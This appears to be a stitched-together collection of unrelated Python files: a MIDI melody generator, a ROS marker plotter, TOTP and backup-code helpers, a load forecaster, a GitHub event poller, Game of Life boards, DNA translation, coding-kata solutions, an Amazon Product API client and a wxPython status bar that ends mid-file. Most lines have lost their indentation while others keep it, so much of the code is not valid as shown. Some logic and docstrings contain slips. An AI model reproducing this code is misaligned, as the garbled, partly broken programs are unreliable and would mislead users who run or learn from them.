import sys
import time
import rtmidi
import random
from funcgen import *
notes = ["C","Db","D","Eb","E","F","Gb","G","Ab","A","Bb","B"]
# Midi output setup
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
if available_ports:
midiout.open_port(0)
else:
midiout.open_virtual_port("My virtual output")
# Decide key
key = 0
# Tempo declaration
bpm = 80
length = 16
beats = 4
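# Minimal flag parsing; hypothetical invocation: python melody.py -k Eb -t 120 -l 32 -b 3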
for i in range(len(sys.argv)):
if(sys.argv[i] == "-k"):
key = notes.index(sys.argv[i + 1])
elif(sys.argv[i] == "-t"):
bpm = int(sys.argv[i + 1])
elif(sys.argv[i] == "-l"):
length = int(sys.argv[i + 1])
elif(sys.argv[i] == "-b"):
beats = float(sys.argv[i + 1])
# Note durations
q = 60/bpm # quarter note
h = 2 * q # half note
w = 2 * h # whole note
e = q / 2 # eighth note
s = e / 2 # sixteenth note
measure = beats * q # length of measure
def play_note(note, duration): # Plays a single note
    if note is None:
time.sleep(duration)
return
note_on = [0x90, note, 127] # Note start, note value, velocity (0-127)
note_off = [0x80, note, 0]
midiout.send_message(note_on)
time.sleep(duration)
midiout.send_message(note_off)
def play_chord(voicing, quality, root, duration): # Plays a chord given a tuple of ints
# Play the root in octaves
midiout.send_message([0x90, int(root) + 24 + key, 127])
midiout.send_message([0x90, int(root) + 36 + key, 127])
for var in voicing: # Send note_on messages for each note
note = int(var) + 60 + key
note_on = [0x90, note, 112]
midiout.send_message(note_on)
# code for playing the melody. plays chord for 1 measure, and randomly chooses quarter and eighth notes from the chord to play over that measure
playtime = 0
scale = major
note = 72 + key
lastnote = 72 + key
while playtime < measure:
possible_notes = []
# Determine by chord quality which notes we can play
if quality == "dominant":
possible_notes.extend(scale.tones[1::])
elif quality == "major":
possible_notes.extend(scale.tones[0:3])
possible_notes.extend(scale.tones[4:6])
elif quality == "phrygian":
possible_notes.extend(scale.tones[1:3])
possible_notes.extend(scale.tones[4::])
elif quality == "dorian":
possible_notes.extend(scale.tones[0:1])
possible_notes.extend(scale.tones[3:6])
elif quality == "aeolian":
possible_notes.extend(scale.tones[0:3])
possible_notes.extend(scale.tones[4:6])
# Bias the possible notes towards chord tones
for tone in voicing:
possible_notes.append(tone % 12)
        # Adjust by octaves to minimize jumps; tones are stored relative to
        # 72 + key, so compare against lastnote in absolute pitch, and iterate
        # over a copy since the list is mutated inside the loop
        for tone in list(possible_notes):
            abs_tone = tone + 72 + key
            if abs(lastnote - abs_tone) > 7:
                if abs(lastnote - (abs_tone - 12)) <= 7:
                    possible_notes.append(tone - 12)
                    possible_notes.remove(tone)
                elif abs(lastnote - (abs_tone + 12)) <= 7:
                    possible_notes.append(tone + 12)
                    possible_notes.remove(tone)
# Adjust note to correct octave and key
note = random.choice(possible_notes) + 72 + key
# 1 in 7 chance to replace note with a rest
note = random.choices([note, None], weights = [6, 1], k=1)[0]
        # Possible rhythmic durations ('dur' rather than 'time', so the time module is not shadowed)
        dur = random.choices([w, (h + q), h, (q + e), q, (e + s), e, s], weights=[1, 2, 3, 4, 10, 3, 10, 3], k=1)[0]
        # Measure handling
        if (playtime + dur) > measure:
            dur = measure - playtime
        playtime = playtime + dur
        if note is not None:
            lastnote = note
        # Play note with given pitch and duration
        play_note(note, dur)
        # Handling sixteenth notes to prevent extreme syncopation
        if dur == s or dur == (e + s):
            note = random.choice(possible_notes) + 72 + key
            play_note(note, s)
            playtime = playtime + s
# Stop the bass note
midiout.send_message([0x80, int(root) + 24 + key, 0])
midiout.send_message([0x80, int(root) + 36 + key, 0])
for var in voicing: # Send note_off messages for each note
note = int(var) + 60 + key
note_off = [0x80, note, 0]
midiout.send_message(note_off)
def closest_voicing(currentVoicing, nextChord):
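    # Voice leading: pick the voicing of the next chord that minimizes the total
    # semitone movement from the current voicing, so chord changes sound smooth.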
best = -1
min_change = 999
for i in range(4):
voicing = nextChord.voicings[i]
semitones = 0
for j in range(min(len(currentVoicing), len(voicing))):
semitones += abs(currentVoicing[j] - voicing[j])
if semitones < min_change:
min_change = semitones
best = i
if best >= 0:
return nextChord.voicings[best]
else:
return random.choice(nextChord.voicings)
print("Key of " + notes[key])
prog = getProg(length)
lastVoicing = []
for chord in prog:
print(chord.symbol)
root = chord.root
voicing = closest_voicing(lastVoicing, chord)
quality = chord.quality
lastVoicing = voicing
play_chord(voicing, quality, root, h)
time.sleep(0.1)
del midiout
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Universitaet Bremen - Institute for Artificial Intelligence (Prof. Beetz)
#
# Author: Minerva Gabriela Vargas Gleason <minervavargasg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rospy
import rospkg
import sys
import yaml
import rosbag
from datetime import datetime
from geometry_msgs.msg import PoseArray
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
class PlotTest:
def __init__(self, r=0.0, g=0.4, b=1.0):
self.r, self.g, self.b = r, g, b
rospy.Subscriber('/data_to_plot', PoseArray, self.plot_callback)
self.marker_pub = rospy.Publisher('eef_trajectory_marker_array', MarkerArray, queue_size=1)
#self.marker_pub = rospy.Publisher('visualization_marker', MarkerArray, queue_size=1)
self.flag = False
def plot_callback(self, pose_array):
#self.pose_array = pose_array
if len(pose_array.poses) > 0:
if not self.flag:
# self.write_bag(pose_array)
self.create_markers(pose_array, self.r, self.g, self.b)
self.flag = True
def create_markers(self, pose_array, r, g, b):
self.pose_array = pose_array
markerArray = MarkerArray()
for n,pose in enumerate(self.pose_array.poses):
marker = Marker()
marker.pose = pose
marker.header.frame_id = "odom"
marker.header.stamp = rospy.Time.now()
            marker.id = int(n * b * 10)  # marker IDs must be integers
marker.ns = "marker_" + str(n)
marker.type = marker.CUBE
marker.action = marker.ADD
marker.scale.x = 0.015
marker.scale.y = 0.015
marker.scale.z = 0.015
marker.color.r = r
marker.color.g = g
marker.color.b = b
marker.color.a = 1.0
markerArray.markers.append(marker)
#self.yaml_writer(markerArray)
rospy.loginfo('Plotting EEF trajectory')
self.marker_pub.publish(markerArray)
@staticmethod
def yaml_writer(markerArray):
# Write a YAML file with the parameters for the simulated controller
try:
# Open YAML configuration file
pack = rospkg.RosPack()
dir = pack.get_path('iai_markers_tracking') + '/test_plot_data/controller_param.yaml'
data = markerArray
# Write file
with open(dir, 'w') as outfile:
yaml.dump(data, outfile, default_flow_style=False)
except yaml.YAMLError:
            rospy.logerr("Unexpected error while writing controller configuration YAML file: %s", sys.exc_info()[0])
return -1
@staticmethod
def write_bag(pose_array):
pack = rospkg.RosPack()
hoy = datetime.now()
day = '-' + str(hoy.month) + '-' + str(hoy.day) + '_' + str(hoy.hour) + '-' + str(hoy.minute)
dir = pack.get_path('iai_markers_tracking') + '/test_plot_data/test_2017' + day + '.bag'
bag = rosbag.Bag(dir, 'w')
try:
bag.write('data_to_plot',pose_array)
finally:
bag.close()
return 0
def main(r=0.0, g=0.4, b=1.0):
PlotTest(r, g, b)
#play_bag()
return 0
def play_bag():
pt = PlotTest()
pack = rospkg.RosPack()
dir = pack.get_path('iai_trajectory_generation_boxy') + '/test_plot_data/test.bag'
bag = rosbag.Bag(dir)
for topic, msg, t in bag.read_messages(topics=['data_to_plot']):
        print('plot')
pt.create_markers(msg, 0.0, 0.4, 1.0)
bag.close()
if __name__ == '__main__':
try:
        rospy.init_node('plot_eef_trajectory')
        main()
        rospy.spin()  # keep the node alive so plot_callback can receive messages
except rospy.ROSInterruptException:
pass
|
import pyotp
from flask_security.utils import hash_password, verify_password
from .misc import gen_random_code, clean_random_code
BACKUP_CODE_COUNT = 16
ISSUER = 'Zcash Grants'
def gen_backup_code():
return f'{gen_random_code(5)}-{gen_random_code(5)}'.lower()
def gen_backup_codes():
return [gen_backup_code() for x in range(BACKUP_CODE_COUNT)]
def hash_backup_codes(codes):
return [hash_password(clean_random_code(c)) for c in codes]
def serialize_backup_codes(codes: tuple):
hashed = hash_backup_codes(codes)
return ','.join(hashed)
def deserialize_backup_codes(codes: str):
return codes.split(',')
def verify_and_update_backup_codes(code: str, serialized_codes: str):
hashed = deserialize_backup_codes(serialized_codes)
for i, hc in enumerate(hashed):
if verify_password(clean_random_code(code), hc):
del hashed[i]
return ','.join(hashed)
return None
def gen_otp_secret():
return pyotp.random_base32()
def verify_totp(secret: str, code: str):
totp = pyotp.TOTP(secret)
return totp.verify(code)
def current_totp(secret: str):
totp = pyotp.TOTP(secret)
return totp.now()
def gen_uri(secret: str, email: str):
return pyotp.totp.TOTP(secret).provisioning_uri(email, issuer_name=ISSUER)
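# Hedged usage sketch: generate codes once at 2FA setup, store only the serialized
# hashes, and consume a code on login (names below are this module's functions):
#   codes = gen_backup_codes()                # show these to the user exactly once
#   stored = serialize_backup_codes(codes)    # persist only the hashed, joined form
#   stored = verify_and_update_backup_codes(user_input, stored)  # None if invalid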
|
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
class GradientBoosting:
def __init__(self, validate=True,adaptive=False):
self.x_train=None
self.y_train = None
np.set_printoptions(precision=5)
self.model = GradientBoostingRegressor(loss='ls',n_estimators=100)
self.adaptive=adaptive
self.validate=validate
def generate_x(self,X,dates,stepAhead):
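        # Build a 13-feature vector per sample: hour and weekday, the last 4
        # available temperatures, the last 2 load values, the mean of the last
        # 24 load values, and 24/48/72/168-hour lagged loads aligned with stepAhead.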
xLoad=X[:,168:]
xTemp=X[:,:168]
newX=np.empty((xLoad.shape[0],13))
newX[:,0]=dates[:].hour
newX[:,1]=dates[:].dayofweek
newX[:,2:6]=xTemp[:,-4:]#last 4 hours available
newX[:,6:8]=xLoad[:,-2:] # 1 and 2 hour lagged load (last 2 hours available)
newX[:,8]=np.mean(xLoad[:,-24:],axis=1) #(average of last 24 hours available)
newX[:,9]=xLoad[:,-24+stepAhead-1] # 24 hour lagged load (matching with output)
newX[:,10]=xLoad[:,-48+stepAhead-1] # 48 hour lagged load (matching with output)
newX[:,11]=xLoad[:,-72+stepAhead-1] # 72 hour lagged load (matching with output)
newX[:,12]=xLoad[:,-168+stepAhead-1] # 168 hour lagged load (previous week - (matching with output))
return newX
def getRMSE(self, y, y_predict):
return np.sqrt((np.power(y_predict-y,2)).sum()/y_predict.size)
def fit(self, X, y):
if len(y.shape)<=1:
y=y.reshape([-1,1])
if self.validate:
return self.fit_validate(X,y)
self.model.fit(X,y.ravel())
self.x_train=X
self.y_train=y
    def predict(self, X, y=None):
        if len(X.shape)<=1:
            X=X.reshape([1,-1])
        if self.adaptive:
            print('adaptive...')
            # adaptive prediction refits after every sample, so true targets are required
            return self.predict_adaptive(X, y)
        else:
            return self.model.predict(X)
def predict_adaptive(self, X,y):
yhat=np.empty((X.shape[0],1))
        for i in range(X.shape[0]):
_x=np.expand_dims(X[i,:],axis=0)
yhat[i,:]=self.model.predict(_x)
_y=y[i,:].reshape([1,-1])
self.x_train=np.concatenate([self.x_train,_x])
self.y_train=np.concatenate([self.y_train,_y])
self.model.fit(self.x_train,self.y_train.ravel())
return yhat
def fit_validate(self, X, y):
n_estimators=np.array([1,20,50,100])
bestN=0
best_error=np.inf
        nVal=int(X.shape[0]*0.15)
        yVal=y[-nVal:]
        XVal = X[-nVal:,:]
        yTrain = y[:-nVal]   # train on the first 85%, validate on the last 15%
        XTrain = X[:-nVal,:]
for i,n in enumerate(n_estimators):
self.model = GradientBoostingRegressor(loss='ls',n_estimators=n)
self.model.fit(XTrain,yTrain.ravel())
y_val=self.model.predict(XVal)
error_v=self.getRMSE(yVal,y_val)
if error_v<best_error:
best_error=error_v
bestN=n
self.model = GradientBoostingRegressor(loss='ls',n_estimators=bestN)
self.model.fit(X, y.ravel())
self.x_train = X
self.y_train = y
|
from datetime import datetime
import math
import requests
import time
from alembic.util import CommandError
from bitcoin_acks.constants import PullRequestState
from bitcoin_acks.database import create_or_update_database
from bitcoin_acks.github_data.polling_data import PollingData
from bitcoin_acks.github_data.pull_requests_data import PullRequestsData
from bitcoin_acks.github_data.repositories_data import RepositoriesData
from bitcoin_acks.logging import log
class PullRequestEvents(RepositoriesData):
def __init__(self, repository_path: str, repository_name: str):
super(PullRequestEvents, self).__init__(repository_path=repository_path,
repository_name=repository_name)
self.etag = None
self.rate_limit_remaining = None
self.rate_limit_reset = None
self.last_update = datetime.utcnow()
def get(self):
url = self.api_url + 'repos/{0}/{1}/events?page=1&per_page=300'.format(
self.repo.path,
self.repo.name
)
headers = {}
if self.etag is not None:
headers['If-None-Match'] = self.etag
response = requests.get(url, auth=self.auth, headers=headers)
if response.status_code == 304:
return
response.raise_for_status()
self.etag = response.headers['etag']
self.rate_limit_remaining = int(response.headers['X-RateLimit-Remaining'])
self.rate_limit_reset = datetime.fromtimestamp(int(response.headers['X-RateLimit-Reset']))
events = response.json()
pull_request_numbers = set()
for event in events:
pr = (event['payload'].get('pull_request', None)
or event['payload'].get('issue', None)
)
if pr is not None and ('base' in pr.keys() or 'pull_request' in pr.keys()):
pull_request_numbers.add(pr['number'])
pr_data = PullRequestsData(repository_path=self.repo.path,
repository_name=self.repo.name)
for number in pull_request_numbers:
pr_data.update(number=number)
if __name__ == '__main__':
import os
repository_path = 'bitcoin'
repository_name = 'bitcoin'
log.debug('Running pull request events update script',
path=os.path.realpath(__file__),
repository_name=repository_name,
repository_path=repository_path
)
try:
create_or_update_database()
except CommandError as e:
log.debug('create_or_update_database failed', stack_info=True)
pr_events = PullRequestEvents(repository_path=repository_path,
repository_name=repository_name)
pr_data = PullRequestsData(repository_path=repository_path,
repository_name=repository_name)
# polling_data = PollingData(repository_path=repository_path,
# repository_name=repository_name)
while True:
pr_events.get()
# polling_data.update(last_event=True)
        # spread the time left until the rate limit resets over the remaining requests
        seconds_to_reset = (pr_events.rate_limit_reset - datetime.utcnow()).total_seconds()
        sleep_time = max(seconds_to_reset, 0) / max(pr_events.rate_limit_remaining, 1)
        time.sleep(math.ceil(sleep_time) + 5)
now = datetime.utcnow()
log.debug('In while True loop', sleep_time=sleep_time, now=now, last_update=pr_events.last_update)
        # check the month first: a month rollover always changes the day too,
        # so the monthly full update must take precedence
        if pr_events.last_update.month != now.month:
            pr_data.update_all()
            # polling_data.update(last_full_update=True)
        elif pr_events.last_update.day != now.day:
            pr_data.update_all(state=PullRequestState.OPEN)
            # polling_data.update(last_open_update=True)
pr_events.last_update = now
|
from django.db import models
# from cloudinary.models import CloudinaryField
class Site(models.Model):
    title = models.CharField('Title', max_length=120)
    url = models.URLField('Site URL')
    description = models.TextField('Description')
    modified = models.DateField('Modified at', auto_now=True)
    created = models.DateField('Created at', auto_now_add=True)
    def __str__(self):
        return self.title
class Meta:
verbose_name = 'Site'
verbose_name_plural = 'Sites'
ordering = ['title']
|
class Board:
def __init__(self):
self.__rows = 16
self.__cols = 16
self.__matrix = [[0 for _ in range(self.__cols)] for _ in range(self.__rows)]
    def load(self, file_name):
        with open(file_name, "r") as f:
            for line in f:
                x, y = line.split(" ")
                self.__matrix[int(x)][int(y)] = 1
def __str__(self):
result = ""
for i in range(self.__rows):
for j in range(self.__cols):
if self.__matrix[i][j] == 1:
result += "#"
else:
result += "@"
result += '\n'
return result
@property
def all(self):
result = []
for i in range(self.__rows):
for j in range(self.__cols):
if self.__matrix[i][j] == 1:
result.append((i, j))
return result
def update(self, i, j):
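        # Conway's rules: a cell with fewer than 2 or more than 3 live neighbours
        # dies, one with exactly 3 becomes (or stays) alive, otherwise it keeps its state.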
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
alive = 0
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if 0 <= ii < self.__rows and 0 <= jj < self.__cols and self.__matrix[ii][jj]:
alive += 1
if alive > 3 or alive < 2:
return 0
elif alive == 3:
return 1
return self.__matrix[i][j]
def update_board(self):
result = []
for i in range(self.__rows):
for j in range(self.__cols):
result.append((i, j, self.update(i, j)))
for elem in result:
i, j, c = elem
self.__matrix[i][j] = c
class SparseBoard:
    def __init__(self):
        self.__mat = {}
def __setitem__(self, key, value):
i, j = key
if i not in self.__mat:
self.__mat[i] = {}
self.__mat[i][j] = value
if self.__mat[i][j] is None or self.__mat[i][j] == 0:
del self.__mat[i][j]
def __getitem__(self, key):
i, j = key
if i not in self.__mat:
return None
if j not in self.__mat[i]:
return None
return self.__mat[i][j]
@property
def all(self):
result = []
for i in self.__mat:
for j in self.__mat[i]:
result.append((i, j))
return result
    def load(self, file_name):
        with open(file_name, "r") as f:
            for line in f:
                x, y = line.split(" ")
                self.__setitem__((int(y), int(x)), 1)
def rules(self, i, j):
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
alive = 0
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if self.__getitem__((ii, jj)):
alive += 1
if alive > 3 or alive < 2:
return False
if alive == 3:
return True
if self.__getitem__((i, j)) == 1:
return True
return False
def update(self):
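        # Only cells in the neighbourhood of a live cell can be alive next step
        # (any survivor has at least 2 live neighbours), so applying the rules to
        # every live cell's neighbours covers all candidates.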
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
new_board = SparseBoard()
for i in self.__mat:
for j in self.__mat[i]:
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if self.rules(ii, jj):
new_board[(ii, jj)] = 1
del self.__mat
self.__mat = new_board.__mat
|
mass_table = {
'G': 57.021464, 'A': 71.037114, 'S': 87.032028, 'P': 97.052764,
'V': 99.068414, 'T': 101.047678, 'C': 103.009184, 'I': 113.084064,
'L': 113.084064, 'N': 114.042927, 'D': 115.026943, 'Q': 128.058578,
'K': 128.094963, 'E': 129.042593, 'M': 131.040485, 'H': 137.058912,
'F': 147.068414, 'R': 156.101111, 'Y': 163.063329, 'W': 186.079313}
dna_codon = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',
'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}
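# '_' marks the three stop codons (TAA, TAG, TGA)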
def parse(filepath):
    """Parse a FASTA file into a dict mapping sequence IDs to sequences."""
    with open(filepath) as f:
        dictionary = dict()
        seq_id = None
        seq = []
        line = f.readline().rstrip()
        while line != '':
            if line.startswith('>'):
                if seq_id is not None:
                    dictionary[seq_id] = ''.join(seq)
                seq_id = line.lstrip('>')
                seq = []
            else:
                seq.append(line)
            line = f.readline().rstrip()
        if seq_id is not None:
            dictionary[seq_id] = ''.join(seq)
        return dictionary
def translate(dna_seq, start_from_start_codon=False, stop_on_stop_codons=False):
    length = len(dna_seq)
    step = 0
    prot_string = str()
    start = True
    if start_from_start_codon:
        start = False
while step<length-2:
codon = dna_seq[step:step+3]
if codon == 'ATG':
start = True
if start:
if stop_on_stop_codons and (codon in ['TAA', 'TGA', 'TAG']):
break
prot = dna_codon[codon]
prot_string = ''.join([prot_string, prot])
step += 3
return prot_string
def calc_mass(prot_seq):
    total = 0  # avoid shadowing the built-in sum
    for i in prot_seq:
        total += mass_table[i]
    return total
def orf(dna_seq):
    length = len(dna_seq)
    p_list = list()
    # forward strand: scan all three reading frames
    for step in [0, 1, 2]:
        prot_string = str()
        start = False
        while step < length - 2:
            codon = dna_seq[step:step + 3]
            if codon == 'ATG':
                start = True
            if start:
                if codon in ['TAA', 'TGA', 'TAG']:
                    # only ORFs closed by a stop codon are kept
                    start = False
                    break
                prot = dna_codon[codon]
                prot_string = ''.join([prot_string, prot])
            step += 3
        if not start:
            p_list.append(prot_string)
    # reverse strand: build the reverse complement, then scan its three frames
    dd = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}
    dna_seq2 = ''.join(dd[base] for base in reversed(dna_seq))
    for step in [0, 1, 2]:
        prot_string = str()
        start = False
        while step < length - 2:
            codon = dna_seq2[step:step + 3]
            if codon == 'ATG':
                start = True
                # no need to append 'M' here: 'start' is now True, so the
                # branch below translates this same codon
            if start:
                if codon in ['TAA', 'TGA', 'TAG']:
                    start = False
                    break
                prot = dna_codon[codon]
                prot_string = ''.join([prot_string, prot])
            step += 3
        if not start:
            p_list.append(prot_string)
q = 0
while q<len(p_list):
if p_list[q]=='':
p_list.pop(q)
else:
if p_list.count(p_list[q])>1:
p_list.pop(q)
x = p_list[q].split('M')
x = [''.join(['M',i]) for i in x[1:]]
p_list.pop(q)
length = len(x)
for nn in range(length):
p_list.insert(q,''.join(x[nn:length]))
q+=1
return p_list
|
from itertools import product
ADJACENT = {'1': '124', '2': '1235', '3': '236', '4': '1475', '5': '24568',
'6': '3569', '7': '478', '8': '05789', '9': '689', '0': '08'}
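# Each digit maps to itself plus its horizontal/vertical neighbours on a phone
# keypad; get_pins enumerates the Cartesian product of those candidate sets.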
def get_pins(observed):
return [''.join(a) for a in product(*(ADJACENT[b] for b in observed))]
|
# -*- coding: utf-8 -*-
class Solution:
def maxLengthBetweenEqualCharacters(self, s: str) -> int:
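        # Record the first index of each character; for a repeat at index i, the
        # substring strictly between the two occurrences has length i - first - 1.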
occurrences, result = {}, -1
for i, c in enumerate(s):
if c in occurrences:
result = max(result, i - occurrences[c] - 1)
else:
occurrences[c] = i
return result
if __name__ == "__main__":
solution = Solution()
assert 0 == solution.maxLengthBetweenEqualCharacters("aa")
assert 2 == solution.maxLengthBetweenEqualCharacters("abca")
assert -1 == solution.maxLengthBetweenEqualCharacters("cbzxy")
assert 4 == solution.maxLengthBetweenEqualCharacters("cabbac")
|
def inverse_lookup(xs):
    result = dict()
    for i, x in enumerate(xs):
        if x not in result:
            result[x] = i
    return result
def get_with_default(map, key, default):
raise NotImplementedError()
def count_frequencies(xs):
raise NotImplementedError()
def css_lookup(stylesheets, key, default):
raise NotImplementedError()
def word_width(letter_widths, word):
"""
Rekent de breedte van een woord uit in pixels.
Elke letter heeft een verschillende breedte.
De breedte van elke letter staat gegeven in
de dictionary letter_widths.
De breedte van het woord is gelijk aan de
som van de breedtes der letters.
Bv. letter_widths = { 'a': 16, 'b': 16, 'i': 5, 'l': '6', 'w': 20, ... }
word = 'walibi'
geeft als resultaat
20 + 16 + 6 + 5 + 16 + 5 = 68
"""
raise NotImplementedError()
def group_by_extension(filenames):
"""
Gegeven een lijst filenames waarvan de 3 laatste tekens
de extensie vormen, groepeer de bestandsnamen per extensie
in een dictionary.
De keys in de dictionary zijn de extensies,
de bijhorende waarde is een lijst van bestandsnamen
met die extensie.
Bv. [ 'foo.txt', 'bar.txt', 'baz.png' ]
moet de dictionary
{ 'txt': [ 'foo.txt', 'bar'txt' ],
'png': [ 'baz.png' ] }
opleveren.
"""
raise NotImplementedError()
|
import requests
from .builder import AmazonRequestBuilder
from .response import (
AmazonItemSearchResponse,
AmazonItemLookupResponse,
AmazonSimilarityLookupResponse,
)
class AmazonProductAPI(object):
def __init__(self, access_key, secret_key, associate_tag):
self.access_key = access_key
self.secret_key = secret_key
self.associate_tag = associate_tag
self.request_builder = AmazonRequestBuilder(access_key, secret_key, associate_tag)
def _base_params(self, search_index=None, response_groups=None, parameters=None):
if parameters is None:
parameters = {}
default_params = {
'Service': 'AWSECommerceService',
'AWSAccessKeyId': self.access_key,
'AssociateTag': self.associate_tag,
'ResponseGroup': 'Images,ItemAttributes',
'Version': '2013-08-01'
}
if response_groups:
default_params['ResponseGroup'] = ','.join(response_groups)
if search_index:
default_params['SearchIndex'] = search_index
parameters.update(default_params)
return parameters
def item_search(self, search_index, keywords=None, page=None, response_groups=None, parameters=None):
params = self._base_params(search_index, response_groups, parameters)
params['Operation'] = 'ItemSearch'
if keywords:
params['Keywords'] = ','.join(keywords)
if page:
params['ItemPage'] = page
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonItemSearchResponse)
return response
def item_lookup(self, item_id, id_type='ASIN', search_index=None, response_groups=None, parameters=None):
params = self._base_params(search_index, response_groups, parameters)
params['Operation'] = 'ItemLookup'
params['ItemId'] = item_id
params['IdType'] = id_type
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonItemLookupResponse)
return response
def similarity_lookup(self, asins, response_groups=None, parameters=None):
params = self._base_params(response_groups=response_groups, parameters=parameters)
        if not isinstance(asins, list):
asins = [asins]
params['Operation'] = 'SimilarityLookup'
params['ItemId'] = ','.join(asins)
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonSimilarityLookupResponse)
return response
def _make_get_request(self, req_url, response_class):
req = requests.get(req_url)
response = response_class(req)
return response
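# Hedged usage sketch (the keys, tag and ASIN below are placeholders, not real values):
#   api = AmazonProductAPI('ACCESS_KEY', 'SECRET_KEY', 'associate-tag')
#   search = api.item_search('Books', keywords=['python'], page=1)
#   item = api.item_lookup('B00EXAMPLE')
#   similar = api.similarity_lookup(['B00EXAMPLE'])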
|
import os
import sys
from jinja2 import Template
basename = "/home/zcyang/fortinet/ddos/autotest/config"
dirname = "acl"
def get_settings(**args):
template_file = args.get('template')
variable_dict = args.get('variable_dict', {})
fname = os.path.join(basename, dirname, template_file)
print(fname)
    with open(fname, 'r') as fp:
        data = fp.read()
template = Template(data)
data_handle = template.render(**variable_dict)
current_setting = data_handle.split("\n")
    current_setting = [command.strip() for command in current_setting]
current_setting.append(current_setting[0].replace('config','show'))
return current_setting
if __name__ == "__main__":
ar = sys.argv
args = {"variable_dict":{"aname":ar[1], "ip":ar[3]}, "template":ar[1]}
get_settings(**args)
|
"""
Created by Alejandro Daniel Noel
"""
from core import ale_optimizer
from core.plant_graph.ExternalSupplier import ExternalSupplier
from core.plant_graph.machine import Machine
from core.plant_graph.product import Product
from core.plant_graph.json_parser import write_json
ExternalSupplier.reset_instance_tracker()
flour = Product(name="flour", units='kg')
water = Product(name="water", units='liter')
cream = Product(name="cream", units='kg')
dough = Product(name="dough", units='kg', sub_products_quantities={flour: 0.4, water: 0.6})
filling = Product(name="filling", units='liter', sub_products_quantities={cream: 0.7, flour: 0.3})
pie = Product(name="pie", units='unit', sub_products_quantities={dough: 0.5, filling: 0.2})
dough_maker1 = Machine(name="Dough maker 1", min_batch_time=200, max_batch_time=1000, batch_time=500, batch_size=50,
output_product=dough)
filling_maker1 = Machine(name="Filling maker 1", min_batch_time=100, max_batch_time=500.0, batch_time=150, batch_size=20,
output_product=filling)
output_machine = Machine(name="Pie maker", min_batch_time=10, max_batch_time=300, batch_time=50, batch_size=30,
output_product=pie,
suppliers=[dough_maker1, filling_maker1], delays=[22.3, 20.1])
# maximum_output = ale_optimizer.maximize_output(output_machine)
# maximum_output = ale_optimizer.optimize_topology(output_machine, 1.55)
# maximum_output = ale_optimizer.maximize_output(output_machine)
output_machine.set_supplier_rates(0.2)
write_json(output_machine, "Optimized_plant.json")
# print("\nMaximum production is {} pies every second".format(maximum_output))
|
import wx
import os
import prefs
import datetime, time
import EnhancedStatusBar as ESB
from utility import platform
# get the images once at compile time
icons = {}
iconpath = os.path.join(wx.GetApp().path, "icons", "features")
if os.path.exists(iconpath):
for icon_file in os.listdir(iconpath):
        feature, _ = os.path.splitext(icon_file)  # robust to extra dots in file names
icons[feature] = wx.Image(os.path.join(iconpath, icon_file)).ConvertToBitmap()
class StatusBar(ESB.EnhancedStatusBar):
def __init__(self, parent, connection):
ESB.EnhancedStatusBar.__init__(self, parent)
self.parent = parent
self.connection = connection
# status field
self.status_field = wx.Panel(self)
# "feature icons" container
self.feature_tray = wx.Window(self)
self.feature_sizer = wx.BoxSizer()
self.feature_icons = {}
for i,w in icons.items():
icon = FeatureIcon(self.feature_tray, i, w)
self.feature_sizer.Add(icon, 0, wx.EXPAND|wx.SHAPED)
icon.Hide()
self.feature_icons[i] = icon
self.feature_tray.SetSizerAndFit(self.feature_sizer)
# connected-time widget
self.conn_time = wx.StaticText(self, label = "--:--:--:--", style = wx.ALIGN_CENTER_HORIZONTAL)
# "connection status" light
self.conn_status = wx.Window(self)
self.conn_status.SetBackgroundColour(wx.RED)
# Activity blinker for when we're scrolled back
self.activity_blinker = wx.Window(self)
self.blinker_timer = None
# placeholder to keep stuff from being on top of the resizer thumb
self.spacer = wx.Window(self)
self.SetFieldsCount(6)
#self.SetStatusStyles([wx.SB_RAISED, wx.SB_NORMAL, wx.SB_NORMAL, wx.SB_NORMAL])
        self.AddWidget(self.status_field    , horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.feature_tray , horizontalalignment = ESB.ESB_ALIGN_RIGHT , verticalalignment = ESB.ESB_EXACT_FIT)
